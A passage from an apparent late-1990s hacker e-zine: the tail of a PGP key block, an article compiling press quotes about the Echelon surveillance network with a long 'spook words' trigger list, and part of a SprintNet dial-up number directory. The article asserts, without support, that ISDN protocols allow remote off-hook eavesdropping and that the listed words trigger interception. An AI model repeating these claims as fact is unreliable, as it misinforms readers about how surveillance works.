AjbBJstoXp18mAkKjX4t7eRdefXUkk+bGI78KqdLfDL2Qle3CH8IF3KiutapQvMF 6PlTETlPtvFuuUs4INoBp1ajFOmPQFXz0AfGy0OplK33TGSGSfgMg71l6RfUodNQ +PVZX9x2Uk89PY3bzpnhV5JZzf24rnRPxfx2vIPFRzBhznzJZv8V+bv9kV7HAarT W56NoKVyOtQa8L9GAFgr5fSI/VhOSdvNILSd5JEHNmszbDgNRR0PfIizHHxbLY72 88kjwEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy 1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XrPdYX AAICEADh7NOOh8WDmYnTZ3PQiY/op0VMcNCySObEX+wkigF8HTw2g+f60ehn3h81 0QNIk+FUciFom9/1YrKave/pP+RNfAUqjGShTOJDvqhh1hHypQk8mOijchXrfYn3 BQVdmHlxiVdsk0ScrSCaiShu2XJVqyUj7nkkDTWbSBS4RAKpwDm3JqqIB4N0/Aj0 26UMdRHhhJfD/U269Xt7HlPUOyUAFQrxzFa2QvVvpL37TCA2EDreAuvcnuUByIyN 8OlAHP1VSKJl2mnAFEYw4jsXG7Cf3JVk2SLYQ+HpMaHKWuG0VGu/nwJcdHigZwnQ 21uCCIaWQAzdMz7bZkHN569nyJi6pxRZibeqtu+0vHNbS5cI66M77nnzKzvJnDx1 FoGTs0u0KUKRfTCO4RNUSE4THmtbPyn2GZ9oRgjkRJk9pQ6GmwzJSaJBChTxQ2P/ bHSU0qMk5MK733DlAh23qevzfMz96GJI88jbGwRJwO07KxyWU1sVhxcPXJmOc+f2 1oRzfPTDXgj1PaNVqcW5rrkSgVbXgR8rIun9QTx7HP1CM/FR7Gh+37BEglkvwFfT WMWU9tmCqYfH+SmAjbIVFYKKPQzjd8wQn24GDvngwwVcSIKqHAZK0mllo3xQFc/k nRuKfBQ4wKcar6Lau2ojWLYtq3LE4XIixfEeeCEXf3jSez6CmIkARgQYEQIABgUC Nd9jFAAKCRAoN2vIs9pmzPhPAKCTnVl65YxmaaDOQyZS/QKF7s9/rACbBVWA4CYT XF2X0OyDzmAN05XDiFY= =6sLs -----END PGP PUBLIC KEY BLOCK----- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Echelon Continued ]:::::[OO--[ by hybrid ]---[ hybrid@dtmf.org ]::: -->[OO]::::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::::: After looking around on the net for echelon releated information (limeted) we managed to find various snippets of information, as follows: Codename: Echelon A report to the European parliament states: " Within Europe, all email, telephone and fax communications are routinely intercepted by the United States National Security Agency, transferring all target information from the European mainland ... to [The headquarter of NSA] ... a global surveillance system that stretches around the world to form a targeting system on all of the key Intelsat satellites used to convey most of the world's satellite phone calls, internet, email, faxes and telexes. ...unlike many of the electronic spy systems developed during the cold war, ECHELON is designed for primarily non-military targets: governments, organisations and businesses in virtually every country... Five nations share the results with the US as the senior partner ... Britain, Canada, New Zealand and Australia are very much acting as subordinate information servicers " " But European diplomats are tearing the shroud of secrecy, tired of snooping by the US on their citizens. The use of ECHELON against European citizens was a central topic in a European Parliament STOA report published this past January, "Technologies of Political Control, which confirmed a decades worth of reports by several determined journalists about global spying by the NSA. " DoD News Briefing, Tuesday, April 21, 1998, Captain Mike Doubleday, DASD (PA) " Captain Doubleday: Welcome to the briefing. I have no announcements, so let me try and answer some questions. " [Big snip, Last question..] " Q: Can you comment about a report recently to the European parliament concerning the development these last years of U.S. and British eavesdropping system called Echelon. " " A: I'm sorry to say I have absolutely nothing on that. Press: Thank you. " Despatches, BBC News December 18, 1997 " A new report commissioned by the European Parliament has officially confirmed the existence of what it says is a gigantic electronic spy network that monitors almost all phone, fax and other electronic communications in Europe. " . . . . "I assume that it is all being monitored with keyword scanning," Pike says. "They throw away almost all of the stuff they collect. But they have that watch list for names and they are working on voice-recognition software and that's going to be the big thing in the future." Such technology is used jointly by NSA and its allies as a "creative" means to avoid court orders, Pike claims. . . . . In 1992, a year before the alleged bugging of the Seattle conference, a group of agents for GCHQ, the British counterpart of the NSA, blasted ECHELON. "We feel we can no longer remain silent regarding that which we regard to be gross malpractice and negligence within the establishment in which we operate," the intelligence agents told the London Observer. The British agents claimed the NSA even helped intercept communications from Amnesty International and Christian Aid. Asked about ECHELON, the NSA says, "We have no information to provide." . . . . Given all this snooping, there is little wonder that a worldwide market has developed for impenetrable encryption,... "What we need is strong encryption available to everybody. Yes, it's going to cramp the style of the folks at the Puzzle Palace [NSA], but a life more difficult at NSA means life is easier for the rest of the planet. The benefits of promoting global Internet commerce outweigh the harm to the NSA." . . . . But, of course, exporting sophisticated encryption technology is prohibited, and everything bureaucratically possible is being done to restrict its widespread dissemination in the United States and overseas." Snoops, Sex and Videotape, Sept. 29, 1997 "The reason for the long silence, .[4 years] .. is that the assignment was presented as being for the good of the country. National security was at stake.... the classified information was not leaked but deliberately provided through a complex chain of agencies and operatives for the sole purpose of retaining political power. Much of the information was real-time data that went directly to the NSA via satellites, while other confidential information was taken by FBI couriers to the NSA. In total, 10,000 to 15,000 conversations were recorded." Snooping on Allies Embarrasses U.S, 10/20/97 "Blackmail, lies and deceit may be the only fitting description of the 1993 Seattle Asia-Pacific Economic Cooperation, or APEC, summit where dignitaries from 17 countries are reported to have been placed under electronic surveillance by American agents" " The National Security Agency's top secret ECHELON Dictionary system, run with Canada, NZ, UK, and Australia, monitors the world's telephone, e-mail, and telex communications. " Enough to make you shiva with fear: ISDN and SYSTEM-X switch remote spying: *************************************************************************** 4.4 National & International Communications Interceptions Networks Modern communications systems are virtually transparent to the advanced interceptions equipment which can be used to listen in. Some systems even lend themselves to a dual role as a national interceptions network. For example the message switching system used on digital exchanges like System X in the UK supports an Integrated Services Digital Network (ISDN) protocol. This allows digital devices. E.g. fax to share the system with existing lines. The ISDN subset is defined in their documents as "Signalling CCITT1- series interface for ISDN access. What is not widely known is that built in to the international CCITT protocol is the ability to take phones 'off hook' and listen to the conversations occurring near the phone, without the user being aware that it is happening. (SGR Newsletter, No.4,1993) This effectively means that a national dial up telephone tapping capacity is built into these systems from the start. (System X has been exported to Russia and China) Similarly, the digital technology required to pinpoint mobile phone users for incoming phone calls, means that all mobile phone users in a country when activated, are mini-tracking devices, giving their owners whereabouts at any time and stored in the company's computer for up to two years. Coupled with System X technology, this is a custom built mobile track, tail and tap system par excellence. (Sunday telegraph, 2.2.97) ***************************************************************************** " The British watchdog group Statewatch revealed confidential documents from the European Union's intergovernmental meetings that show a global wiretapping system is under way among Europe, the United States and other industrialized countries. " Federation of American Scientists defines Echelon as: " ECHELON consists of a global network of computers that automatically search through millions of intercepted for pre-programmed keywords or fax, telex and e-mail addresses. Every word of every message in the frequencies and channels selected at a station is automatically searched. The processors in the network are known as the ECHELON Dictionaries. ECHELON connects all these computers and allows the individual stations to function as distributed elements an integrated system. An ECHELON station's Dictionary contains not only its parent agency's chosen keywords, but also lists for each of the other four agencies in the UKUSA system [NSA, GCHQ, DSD, GCSB and CSE] " BT condemned for listing cables to US sigint station: " for revealing detailed information about top secret high capacity cables feeding phone and other messages to and from a Yorkshire monitoring base. BT admitted this week that they have connected three digital optical fibre cables - capable of carrying more than 100,000 telephone calls at once - to the American intelligence base at Menwith Hill, near Harrogate. "The national interest of the United Kingdom, even if if is conducted dishonestly, requires this to be kept secret", said Judge Crabtree. " So it appears that the big brother spying system operates or is triggered by certain words that could concern national/international security etc.. like, for example, you are on the phone to someone and you say.. " kill the presedent "... heh, well here is the list of words that will trigger the spying system either through voice (phone) fax, or any other kind of communication that can be digitaly monitored. The scary thing is, it appears that system-x switches (the UK's digital switch network) have got built in remote spying resources on them, i better be more carefull when talking to my russian comrads about our world domination plans.. Rewson, SAFE, Waihopai, INFOSEC, ASPIC, MI6, Information Security, SAI, Information Warfare, IW, IS, Privacy, Information Terrorism, Terrorism Defensive Information, Defense Information Warfare, Offensive Information, Offensive Information Warfare, The Artful Dodger, NAIA, SAPM, ASU, ASTS, National Information Infrastructure, InfoSec, SAO, Reno, Compsec, JICS, Computer Terrorism, Firewalls, Secure Internet Connections, RSP, ISS, JDF, Ermes, Passwords, NAAP, DefCon V, RSO, Hackers, Encryption, ASWS, CUN, CISU, CUSI, M.A.R.E., MARE, UFO, IFO, Pacini, Angela, Espionage, USDOJ, NSA, CIA, S/Key, SSL, FBI, Secert Service, USSS, Defcon, Military, White House, Undercover, NCCS, Mayfly, PGP, SALDV, PEM, resta, RSA, Perl-RSA, MSNBC, bet, AOL, AOL TOS, CIS, CBOT, AIMSX, STARLAN, 3B2, BITNET, SAMU, COSMOS, DATTA, Furbys, E911, FCIC, HTCIA, IACIS, UT/RUS, JANET, ram, JICC, ReMOB, LEETAC, UTU, VNET, BRLO, SADCC, NSLEP, SACLANTCEN, FALN, 877, NAVELEXSYSSECENGCEN, BZ, CANSLO, CBNRC, CIDA, JAVA, rsta, Active X, Compsec 97, RENS, LLC, DERA, JIC, rip, rb, Wu, RDI, Mavricks, BIOL, Meta-hackers, ^?, SADT, Steve Case, Tools, RECCEX, Telex, OTAN, monarchist, NMIC, NIOG, IDB, MID/KL, NADIS, NMI, SEIDM, BNC, CNCIS, STEEPLEBUSH, RG, BSS, DDIS, mixmaster, BCCI, BRGE, Europol, SARL, Military Intelligence, JICA, Scully, recondo, Flame, Infowar, Bubba, Freeh, Archives, ISADC, CISSP, Sundevil, jack, Investigation, JOTS, ISACA, NCSA, ASVC, spook words, RRF, 1071, Bugs Bunny, Verisign, Secure, ASIO, Lebed, ICE, NRO, Lexis-Nexis, NSCT, SCIF, FLiR, JIC, bce, Lacrosse, Flashbangs, HRT, IRA, EODG, DIA, USCOI, CID, BOP, FINCEN, FLETC, NIJ, ACC, AFSPC, BMDO, site, SASSTIXS, NAVWAN, NRL, RL, NAVWCWPNS, NSWC, USAFA, AHPCRC, ARPA, SARD, LABLINK, USACIL, SAPT, USCG, NRC, ~, O, NSA/CSS, CDC, DOE, SAAM, FMS, HPCC, NTIS, SEL, USCODE, CISE, SIRC, CIM, ISN, DJC, LLNL, bemd, SGC, UNCPCJ, CFC, SABENA, DREO, CDA, SADRS, DRA, SHAPE, bird dog, SACLANT, BECCA, DCJFTF, HALO, SC, TA SAS, Lander, GSM, T Branch, AST, SAMCOMM, HAHO, FKS, 868, GCHQ, DITSA, SORT, AMEMB, NSG, HIC, EDI, benelux, SAS, SBS, SAW, UDT, EODC, GOE, DOE, SAMF, GEO, JRB, 3P-HV, Masuda, Forte, AT, GIGN, Exon Shell, radint, MB, CQB, TECS, CONUS, CTU, RCMP, GRU, SASR, GSG-9, 22nd SAS, GEOS, EADA, SART, BBE, STEP, Echelon, Dictionary, MD2, MD4, MDA, diwn, 747, ASIC, 777, RDI, 767, MI5, 737, MI6, 757, Kh-11, EODN, SHS, ^X, Shayet-13, SADMS, Spetznaz, Recce, 707, CIO, NOCS, Halcon, NSS, Duress, RAID, Uziel, wojo, Psyops, SASCOM, grom, NSIRL, D-11, DF, ZARK, SERT, VIP, ARC, S.E.T. Team, NSWG, MP5k, SATKA, DREC, DEVGRP, DSD, FDM, GRU, LRTS, SIGDEV, NACSI, MEU/SOC,PSAC, PTT, RFI, ZL31, SIGDASYS, TDM. SUKLO, Schengen, SUSLO, TELINT, fake, TEXTA. ELF, LF, MF, Mafia, JASSM, CALCM, TLAM, Wipeout, GII, SIW, MEII, C2W, Burns, Tomlinson, Ufologico Nazionale, Centro, CICAP, MIR, Belknap, Tac, rebels, BLU-97 A/B, 007, nowhere.ch, bronze, Rubin, Arnett, BLU, SIGS, VHF, Recon, peapod, PA598D28, Spall, dort, 50MZ, 11Emc Choe, SATCOMA, UHF, The Hague, SHF, ASIO, SASP, WANK, Colonel, domestic disruption, 5ESS, smuggle, Z-200, 15kg, DUVDEVAN, RFX, nitrate, OIR, Pretoria, M-14, enigma, Bletchley Park, Clandestine, NSO, nkvd, argus, afsatcom, CQB, NVD, Counter Terrorism Security, Enemy of the State, SARA, Rapid Reaction, JSOFC3IP, Corporate Security, 192.47.242.7, Baldwin, Wilma, ie.org, cospo.osis.gov, Police, Dateline, Tyrell, KMI, 1ee, Pod, 9705 Samford Road, 20755-6000, sniper, PPS, ASIS, ASLET, TSCM, Security Consulting, M-x spook, Z-150T, High Security, Security Evaluation, Electronic Surveillance, MI-17, ISR, NSAS, Counterterrorism, real, spies, IWO, eavesdropping, debugging, CCSS, interception, COCOT, NACSI, rhost, rhosts, ASO, SETA, Amherst, Broadside, Capricorn, NAVCM, Gamma, Gorizont, Guppy, NSS, rita, ISSO, submiss, ASDIC, .tc, 2EME REP, FID, 7NL SBS, tekka, captain, 226, .45, nonac, .li, Tony Poe, MJ-12, JASON, Society, Hmong, Majic, evil, zipgun, tax, bootleg, warez, TRV, ERV, rednoise, mindwar, nailbomb, VLF, ULF, Paperclip, Chatter, MKULTRA, MKDELTA, Bluebird, MKNAOMI, White Yankee, MKSEARCH, 355 ML, Adriatic, Goldman, Ionosphere, Mole, Keyhole, NABS, Kilderkin, Artichoke, Badger, Emerson, Tzvrif, SDIS, T2S2, STTC, DNR, NADDIS, NFLIS, CFD, BLU-114/B, quarter, Cornflower, Daisy, Egret, Iris, JSOTF, Hollyhock, Jasmine, Juile, Vinnell, B.D.M., Sphinx, Stephanie, Reflection, Spoke, Talent, Trump, FX, FXR, IMF, POCSAG, rusers, Covert Video, Intiso, r00t, lock picking, Beyond Hope, LASINT, csystems, .tm, passwd, 2600 Magazine, JUWTF, Competitor, EO, Chan, Pathfinders, SEAL Team 3, JTF, Nash, ISSAA, B61-11, Alouette, executive, Event Security, Mace, Cap-Stun, stakeout, ninja, ASIS, ISA, EOD, Oscor, Tarawa, COSMOS-2224, COSTIND, hit word, hitword, Hitwords, Regli, VBS, Leuken-Baden, number key, Zimmerwald, DDPS, GRS, AGT. AMME, ANDVT, Type I, Type II, VFCT, VGPL, WHCA, WSA, WSP, WWABNCP, ZNI1, FSK, FTS2000, GOSIP, GOTS, SACS STU-III, PRF, PMSP, PCMT, I&A, JRSC, ITSDN, Keyer, KG-84C, KWT-46, KWR-46, KY-75, KYV-5, LHR, PARKHILL, LDMX, LEASAT, SNS, SVN, TACSAT, TRANSEC, DONCAF, EAM, DSCS, DSNET1, DSNET2, DSNET3, ECCM, EIP, EKMS, EKMC, DDN, DDP, Merlin, NTT, SL-1, Rolm, TIE, Tie-fighter, PBX, SLI, NTT, MSCJ, MIT, 69, RIT, Time, MSEE, Cable & Wireless, CSE, SUW, J2, Embassy, ETA, Porno, Fax, finks, Fax encryption, white noise, Fernspah, MYK, GAFE, forcast, import, rain, tiger, buzzer, N9, pink noise, CRA, M.P.R.I., top secret, Mossberg, 50BMG, Macintosh Security, Macintosh Internet Security, OC3, Macintosh Firewalls, Unix Security, VIP Protection, SIG, sweep, Medco, TRD, TDR, Z, sweeping, SURSAT, 5926, TELINT, Audiotel, Harvard, 1080H, SWS, Asset, Satellite imagery, force, NAIAG, Cypherpunks, NARF, 127, Coderpunks, TRW, remailers, replay, redheads, RX-7, explicit, FLAME, J-6, Pornstars, AVN, Playboy, ISSSP, Anonymous, W, Sex, chaining, codes, Nuclear, 20, subversives, SLIP, toad, fish, data havens, unix, c, a, b, d, SUBACS, the, Elvis, quiche, DES, 1*, N-ISDN, NLSP, OTAR, OTAT, OTCIXS, MISSI, MOSAIC, NAVCOMPARS, NCTS, NESP, MILSATCOM, AUTODIN, BLACKER, C3I, C4I, CMS, CMW, CP, SBU, SCCN, SITOR, SHF/DOD, Finksburg MD, Link 16, LATA, NATIA, NATOA, sneakers, UXO, (), OC-12, counterintelligence, Shaldag, sport, NASA, TWA, DT, gtegsc, nowhere, .ch, hope, emc, industrial espionage, SUPIR, PI, TSCI, spookwords, industrial intelligence, H.N.P., SUAEWICS, Juiliett Class Submarine, Locks, qrss, loch, 64 Vauxhall Cross, Ingram Mac-10, wwics, sigvoice, ssa, E.O.D., SEMTEX, penrep, racal, OTP, OSS, Siemens, RPC, Met, CIA-DST, INI, watchers, keebler, contacts, Blowpipe, BTM, CCS, GSA, Kilo Class, squib, primacord, RSP, Z7, Becker, Nerd, fangs, Austin, no|d, Comirex, GPMG, Speakeasy, humint, GEODSS, SORO, M5, BROMURE, ANC, zone, SBI, DSS, S.A.I.C., Minox, Keyhole, SAR, Rand Corporation, Starr, Wackenhutt, EO, burhop, Wackendude, mol, Shelton, 2E781, F-22, 2010, JCET, cocaine, Vale, IG, Kosovo, Dake, 36,800, Hillal, Pesec, Hindawi, GGL, NAICC, CTU, botux, Virii, CCC, ISPE, CCSC, Scud, SecDef, Magdeyev, VOA, Kosiura, Small Pox, Tajik, +=, Blacklisted 411, TRDL, Internet Underground, BX, XS4ALL, wetsu, muezzin, Retinal Fetish, WIR, Fetish, FCA, Yobie, forschung, emm, ANZUS, Reprieve, NZC-332, edition, cards, mania, 701, CTP, CATO, Phon-e, Chicago Posse, NSDM, l0ck, beanpole, spook, keywords, QRR, PLA, TDYC, W3, CUD, CdC, Weekly World News, Zen, World Domination, Dead, GRU, M72750, Salsa, 7, Blowfish, Gorelick, Glock, Ft. Meade, NSWT, press-release, WISDIM, burned, Indigo, wire transfer, e-cash, Bubba the Love Sponge, Enforcers, Digicash, zip, SWAT, Ortega, PPP, NACSE, crypto-anarchy, AT&T, SGI, SUN, MCI, Blacknet, ISM, JCE, Middleman, KLM, Blackbird, NSV, GQ360, X400, Texas, jihad, SDI, BRIGAND, Uzi, Fort Meade, *&, gchq.gov.uk, supercomputer, bullion, 3, NTTC, Blackmednet, :, Propaganda, ABC, Satellite phones, IWIS, Planet-1, ISTA, rs9512c, Jiang Zemin, South Africa, Sergeyev, Montenegro, Toeffler, Rebollo, sorot, Yucca Mountain, FARC, Toth, Xu Yongyue, Bach, Razor, AC, cryptanalysis, nuclear, 52 52 N - 03 03 W, Morgan, Canine, GEBA, INSCOM, MEMEX, Stanley, FBI, Panama, fissionable, Sears Tower, NORAD, Delta Force, SEAL, virtual, WASS, WID, Dolch, secure shell, screws, Black-Ops, O/S, Area51, SABC, basement, ISWG, $@, data-haven, NSDD, black-bag, rack, TEMPEST, Goodwin, rebels, ID, MD5, IDEA, garbage, market, beef, Stego, ISAF, unclassified, Sayeret Tzanhanim, PARASAR, Gripan, pirg, curly, Taiwan, guest, utopia, NSG, orthodox, CCSQ, Alica, SHA, Global, gorilla, Bob, UNSCOM, Fukuyama, Manfurov, Kvashnin, Marx, Abdurahmon, snullen, Pseudonyms, MITM, NARF, Gray Data, VLSI, mega, Leitrim, Yakima, NSES, Sugar Grove, WAS, Cowboy, Gist, 8182, Gatt, Platform, 1911, Geraldton, UKUSA, veggie, XM, Parvus, NAVSVS, 3848, Morwenstow, Consul, Oratory, Pine Gap, Menwith, Mantis, DSD, BVD, 1984, blow out, BUDS, WQC, Flintlock, PABX, Electron, Chicago Crust, e95, DDR&E, 3M, KEDO, iButton, R1, erco, Toffler, FAS, RHL, K3, Visa/BCC, SNT, Ceridian, STE, condor, CipherTAC-2000, Etacs, Shipiro, ssor, piz, fritz, KY, 32, Edens, Kiwis, Kamumaruha, DODIG, Firefly, HRM, Albright, Bellcore, rail, csim, NMS, 2c, FIPS140-1, CAVE, E-Bomb, CDMA, Fortezza, 355ml, ISSC, cybercash, NAWAS, government, NSY, hate, speedbump, joe, illuminati, BOSS, Kourou, Misawa, Morse, HF, P415, ladylove, filofax, Gulf, lamma, Unit 5707, Sayeret Mat'Kal, Unit 669, Sayeret Golani, Lanceros, Summercon, NSADS, president, ISFR, freedom, ISSO, walburn, Defcon VI, DC6, Larson, P99, HERF pipe-bomb, 2.3 Oz., cocaine, $, imapct, Roswell, ESN, COS, E.T., credit card, b9, fraud, ST1, assasinate, virus, ISCS, ISPR, anarchy, rogue, mailbomb, 888, Chelsea, 1997, Whitewater, MOD, York, plutonium, William Gates, clone, BATF, SGDN, Nike, WWSV, Atlas, IWWSVCS, Delta, TWA, Kiwi, PGP 2.6.2., PGP 5.0i, PGP 5.1, siliconpimp, SASSTIXS, IWG, Lynch, 414, Face, Pixar, IRIDF, NSRB, eternity server, Skytel, Yukon, Templeton, Johohonbu, LUK, Cohiba, Soros, Standford, niche, ISEP, ISEC, 51, H&K, USP, ^, sardine, bank, EUB, USP, PCS, NRO, Red Cell, NSOF, DC7, Glock 26, snuffle, Patel, package, ISI, INR, INS, GRU, RUOP, GSS, NSP, SRI, Ronco, Armani, BOSS, Chobetsu, FBIS, BND, SISDE, FSB, BfV, IB, froglegs, JITEM, SADF, advise, TUSA, LITE, PKK, HoHoCon, SISMI, ISG, FIS, MSW, Spyderco, UOP, SSCI, NIMA, HAMASMOIS, SVR, SIN, advisors, SAP, Monica, OAU, PFS, Aladdin, AG, chameleon man, Hutsul, CESID, Bess, rail gun, .375, Peering, CSC, Tangimoana Beach, Commecen, Vanuatu, Kwajalein, LHI, DRM, GSGI, DST, MITI, JERTO, SDF, Koancho, Blenheim, Rivera, Kyudanki, varon, 310, 17, 312, NB, CBM, CTP, Sardine, SBIRS, jaws, SGDN, ADIU, DEADBEEF, IDP, IDF, Halibut, SONANGOL, Flu, &, Loin, PGP 5.53, meta, Faber, SFPD, EG&G, ISEP, blackjack, Fox, Aum, AIEWS, AMW, RHL, Baranyi, WORM, MP5K-SD, 1071, WINGS, cdi, VIA, DynCorp, UXO, Ti, WWSP, WID, osco, Mary, honor, Templar, THAAD, package, CISD, ISG, BIOLWPN, JRA, ISB, ISDS, chosen, LBSD, van, schloss, secops, DCSS, DPSD, LIF, J-Star, PRIME, SURVIAC, telex, Analyzer, embassy, Golf, B61-7, Maple, Tokyo, ERR, SBU, Threat, JPL, Tess, SE, Alex, EPL, SPINTCOM, FOUO, ISS-ADP, Merv, Mexico, SUR, blocks, SO13, Rojdykarna, RSOC, USS Banner, S511, 20755, airframe, jya.com, Furby, PECSENC, football, Agfa, 3210, Crowell, moore, 510, OADR, Smith, toffee, FIS, N5P6, EuroFed, SP4, shelter, Crypto AG, So there you have it, the " spook " list.. why the hell is football in there, don't ask me, this list was compiled by information leaking UK intellegence leaking employees of Mi[x].. Remember, big brother IS watching you, George Orwell at large HEH !.. take it easy. Continued research by hybrid (hybrid@dtmf.org) -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ SprintNet Local Access ]:::[OO--[ by redshadow ]::::::::::::::::::: -->[OO]:[ Telephone numbers ]:::::::-[ redshadow@coldmail.com ]::::::::: -->]OO[:::::::::::::::::::::::::::::::::::[ http://redshadow.faithweb.com ]:: Shouts -( z0mba | ginger | kraise | hybrid | simmeth | mranon | #darkcyde )- :*: SprintNet Local Access Telephone Numbers :*: Welcome one and all to my run down on the latest as of Sprint's last update [February 16, 1999] SprintNet local access #s. I extracted this information as you can by dialing "1 800 546 2500" enter "@D" and a Carriage Return, Enter D1 at the TERMINAL= prompt, then your AREA CODE / Local Exchange, at the @ enter "mail" for user name and password enter "phones". The 1999 SprintNet Access directory is available and can be ordered at 800/ 736-1130. For customer service, call toll-free 1-800/877-5045. From overseas locations with non-WATS access, call 404/649-4970. ]A.1[ Domestic Asynchronous Dial Service ]A.2[ Domestic Asynchronous Dial Service aT 300, 1200 and 2400 BPS ]A.3[ Domestic Asynchronous Dial Service aT 14400 BPS ] B [ International Asynchronous Dial Service ] C [ Domestic X.25 Dial Service ]A.1[ DOMESTIC ASYNCHRONOUS DIAL SERVICE - for asynchronous applications - at 300, 1200, 2400, 9600 and 14400 bps - with optional local error protection Asynchronous Dial Service enables you to conveniently access the SprintNet data network with a local telephone call from thousands of U.S. cities and towns. For areas without local access in the U.S., use SprintNet's In-WATS service. In-WATS Service Telephone Number ---------------------------------------- 300-2400 bps 1-800/546-1000 9600/14400 bps 1-800/546-2500 Consult the Data Network Rate Schedule for In-WATS pricing. Domestic Service Requirements ----------------------------- SPEED: MODEM TYPE: 300 bps Bell 103 compatible 1200 bps Bell 212A compatible 2400 bps V.22 bis compatible 9600 bps ITU V.32 compatible 14400 bps ITU V.32 bis compatible Optional Local Error Protection ------------------------------- When using local error protection for speeds of 2400 bps or less, your modem must be MNP compatible, or you can use MNP compatible software in your PC. For V.32 9600 or 14400 bps service, your modem should be MNP or V.42 compatible. Note: Dial the 2400 bps access number when using local error protection at 300, 1200 or 2400 bps. ASYNC.ME: ASYNC.ME: ]A.2[ DOMESTIC ASYNCHRONOUS DIAL SERVICE AT 300, 1200 AND 2400 BPS 300/1200/2400 ST AC CITY BPS CLASS ------------------------------------------------------------- In-WATS 800 546-1000 - CA 310 Compton 516-1007 C CT 860 Middletown 344-8217 B CT 860 New Britain 225-7027 B CT 203 Norwalk 866-7404 B HI 800 Other Islands 272-5299 (1) WI 414 Kenosha 552-9242 C WI 414 Racine 632-2174 C WI 920 Sheboygan 452-3995 C WI 414 West Bend 334-2206 B (1) International data rates apply. ]A.3[ DOMESTIC ASYNCHRONOUS DIAL SERVICE AT 14400 BPS V.32bis ST AC CITY 14000 BPS CLASS -- ---- --------------- ----------------------- ** 800 In- WATS 546-2500 - AK 907 Anchorage 276-0453 (1) AK 907 Juneau 586-4342 (1) AK 907 Barrow 852-2425 (2) AK 907 Bethel 543-2411 (2) AK 907 Cold Bay 532-2371 (2) AK 907 Cordova 424-3744 (2) AK 907 Deadhorse 659-2777 (2) AK 907 Delta Junction 895-5070 (2) AK 907 Dillingham 842-2688 (2) AK 907 Fairbanks 456-3282 (2) AK 907 Glennallen 822-5231 (2) AK 907 Homer 235-5239 (2) AK 907 Iliamna 571-1364 (2) AK 907 Ketchikan 225-1871 (2) AK 907 King Salmon 246-3049 (2) AK 907 Kodiak 486-4061 (2) AK 907 Kotzebue 442-2602 (2) AK 907 McGrath 524-3256 (2) AK 907 Nome 443-2256 (2) AK 907 Northway 778-2301 (2) AK 907 Palmer 745-0200 (2) AK 907 Prudhoe Bay 659-2777 (2) AK 907 St Paul 546-2320 (2) AK 907 Seward 224-3126 (2) AK 907 Sitka 747-5887 (2) AK 907 Soldotna 262-1990 (2) AK 907 Tanana 366-7167 (2) AK 907 Valdez 835-4987 (2) AK 907 Yakutat 784-3453 (2) AL 256 Anniston 236-9711 B AL 205 Birmingham 328-5719 B AL 256 Decatur 355-0206 B AL 334 Dothan 793-5034 B AL 256 Florence 767-0497 B AL 256 Huntsville 533-6787 B AL 334 Mobile 432-9190 B AL 334 Montgomery 264-7284 B AL 205 Tuscaloosa 758-5799 B AR 501 Fayetteville 442-0212 B AR 501 Ft Smith 782-2852 B AR 501 Hot Springs 623-3159 B AR 501 Little Rock 375-4177 B AZ 520 Flagstaff 773-0588 B AZ 602 Phoenix 254-1903 A AZ 520 Tucson 620-0658 B CA 805 Bakersfield 631-0577 B CA 530 Chico 894-6882 B CA 909 Colton 824-5571 B CA 925 Concord 687-0216 C CA 909 Corona 278-1211 B CA 530 Davis 753-4387 B CA 760 Escondido 738-0203 B CA 707 Eureka 444-3091 B CA 707 Fairfield 426-3860 B CA 510 Fremont 249-9220 B CA 559 Fresno 233-6928 B CA 714 Garden Grove 379-7400 B CA 818 Glendale 507-0511 B CA 510 Hayward 538-0623 B CA 805 Lancaster 949-7396 B CA 323 Los Angeles 937-5526 A CA 310 Marina Del Rey 306-3450 B CA 209 Merced 383-2557 B CA 209 Modesto 576-2852 B CA 408 Monterey 655-1925 C CA 707 Napa 257-0217 B CA 510 Oakland 836-3844 B CA 760 Oceanside 430-0613 C CA 760 Palm Springs 343-3470 B CA 650 Palo Alto 856-4854 B CA 510 Pinole 724-0271 C CA 909 Pomona 626-1284 C CA 530 Redding 243-0690 B CA 949 S B Valley 458-0811 B CA 562 S. Fe Springs 802-2275 B CA 916 Sacramento 851-0700 B CA 408 Salinas 443-8791 B CA 650 San Carlos 591-8578 B CA 619 San Diego 233-1025 B CA 415 San Francisco 247-9976 A CA 408 San Jose 294-9067 B CA 805 San Luis Obisp 543-3233 B CA 310 San Pedro 548-7146 B CA 415 San Rafael 499-1629 C CA 925 San Ramon 829-6705 B CA 714 Santa Ana 558-1501 B CA 805 Santa Barbara 965-3326 B CA 408 Santa Cruz 459-7735 B CA 805 Santa Maria 348-3460 B CA 707 Santa Rosa 523-1048 C CA 209 Stockton 478-0402 C CA 805 Thousand Oaks 449-1500 B CA 805 Ventura 650-9203 B CA 760 Victorville 951-2612 B CA 209 Visalia 627-1201 B CA 626 West Covina 331-6611 C CA 818 Woodland Hills 887-7420 B CO 719 Colorado Sprin 632-0278 B CO 303 Denver 745-3285 A CO 970 Ft Collins 495-6799 B CO 970 Grand Junction 241-3004 B CO 970 Greeley 352-8563 B CO 719 Pueblo 542-4053 B CT 203 Bridgeport 332-7400 B CT 203 Danbury 778-2022 B CT 860 Hartford 560-1385 B CT 203 New Haven 624-5945 B CT 860 New London 440-0656 B CT 203 Stamford 961-8371 B CT 203 Waterbury 759-1445 C DC 202 Washington 659-2733 A DE 302 Dover 678-8328 B DE 302 Newark 292-0114 B FL 561 Boca Raton 367-0732 B FL 941 Cape Coral 334-0071 C FL 407 Cocoa Beach 267-0800 B FL 954 Ft Lauderdale 764-0318 B FL 561 Ft Pierce 466-4566 B FL 352 Gainesville 335-6697 B FL 904 Holly Hill 252-1609 B FL 904 Jacksonville 353-1137 B FL 941 Lakeland 680-3332 C FL 352 Leesburg 787-0799 B FL 407 Melbourne 725-9641 B FL 305 Miami 358-5349 A FL 941 Naples 263-3033 C FL 352 Ocala 351-3790 B FL 407 Orlando 246-0851 B FL 850 Panama City 763-8377 B FL 850 Pensacola 469-9688 C FL 954 Pompano Beach 941-5445 B FL 941 Sarasota 952-1152 C FL 727 St Petersburg 327-7024 B FL 850 Tallahassee 222-0533 B FL 813 Tampa 221-3713 B 